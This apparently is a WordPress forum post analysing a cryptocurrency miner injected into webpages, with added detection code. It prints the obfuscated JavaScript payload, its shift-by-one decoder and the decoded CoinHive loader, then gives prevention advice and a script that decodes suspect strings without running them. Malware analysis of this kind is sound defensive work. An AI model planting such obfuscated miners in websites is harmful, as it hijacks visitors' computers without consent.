• Plugin Author te_taipo (@te_taipo)

    Unfortunately the combination of weak content management security combined with CoinHive has made it quite easy for attackers to embed cryptocurrency miners into webpages. Using obfuscated code, malware authors are able to insert JavaScript into pages that evades detection because the payload is not activated until a user loads the webpage via their web browser.

    This again is a case for prevention rather than cure. Preventing the injection of rogue code into a database is the first and last defense.

    Searching for rogue code in this instance would be difficult, as it is common for many themes and plugins to call for external files such as JavaScript libraries to assist in compiling the functionality of a webpage, which can therefore easily lead to false positives.

    Use: Embedded into webpages

    <script type='text/javascript' src="https://xxxxxxx.com/xxxxxxx"></script>

    Payload:

    (function (id) {
        // Every character of the real payload has been shifted up by one code point.
        var s = "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!~*<njofs/tubsu)*<=0tdsjqu?";
        var res = "";
        var stringLength = s.length;
        var flag = false;
        for (var i = 0; i < stringLength; i++) {
            // Code 40 is '(': the first one becomes the quoted wallet address,
            // any later one is dropped from the output.
            if (s.charCodeAt(i) == 40) {
                if (flag) continue;
                res += "\'" + id;
                flag = true;
            }
            // Shift each character back down by one to recover the original text.
            res += String.fromCharCode(s.charCodeAt(i) - 1);
        }
        // Writes the decoded <script> tags into the page; this is when the miner loads.
        document.write(res);
    })('miners wallet address');

    Decodes to:

    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script> var miner = new CoinHive.Anonymous('miners wallet address', { throttle: 0.2 });miner.start();</script>

    To prevent any rogue code being injected into your website files, or unauthorised files being added to your WordPress files repository, keep your WordPress website, themes and plugins up to date, choose themes and plugins carefully, and use secure webhosting.

    Some security addons like Pareto Security can capture attempts to append code into WordPress, but none of these are as effective as following the above advice.

    • This topic was modified 6 years, 6 months ago by te_taipo.
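As an added example (not code from the post or from the plugin), here is a triage helper that replays the shift-by-one decoder shown above against the string literals found in a file and reports any that decode to injected markup, so an analyst can see what a suspicious literal would write without executing it. The MARKERS list and the SAMPLE input are constructed for this example, and the placeholder id `<WALLET>` is an assumption.

```javascript
// Shift-by-one decoder, the same transformation the injected payload uses,
// but returning the string instead of writing it into the page.
function decodeShifted(s, id) {
  var res = "";
  var flag = false;
  for (var i = 0; i < s.length; i++) {
    if (s.charCodeAt(i) === 40) {        // '(' marks where the wallet id goes
      if (flag) continue;                // later '(' are dropped entirely
      res += "'" + id;
      flag = true;
    }
    res += String.fromCharCode(s.charCodeAt(i) - 1);
  }
  return res;
}

// Substrings that indicate a decoded literal is really injected markup.
// Constructed list for this example; extend with whatever you hunt for.
var MARKERS = ["<script", "coinhive", "miner.start"];

// Pull double-quoted string literals (20+ chars) out of a chunk of JS and
// try the decoder on each. Returns the literals that decode to something
// containing one of the markers, with the decoded text for review.
function findShiftedScripts(source) {
  var hits = [];
  var literal = /"([^"\\\n]{20,})"/g;
  var m;
  while ((m = literal.exec(source)) !== null) {
    var decoded = decodeShifted(m[1], "<WALLET>");   // placeholder id
    var lower = decoded.toLowerCase();
    if (MARKERS.some(function (k) { return lower.includes(k); })) {
      hits.push({ encoded: m[1].slice(0, 24) + "...", decoded: decoded });
    }
  }
  return hits;
}

// Constructed sample: a harmless literal next to the string from the post.
var SAMPLE =
  'var cfg = "some-long-configuration-string-here";\n' +
  'var s = "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?' +
  '=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!~*<njofs/tubsu)*<=0tdsjqu?";';

findShiftedScripts(SAMPLE).forEach(function (h) {
  console.log(h.encoded + " -> " + h.decoded);
});
```

Only the decoded text is produced; nothing is written to a document or evaluated, so it is safe to run over files pulled from a compromised site.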
  • The topic ‘Analysis of an embedded javascript cryptocurrency miner’ is closed to new replies.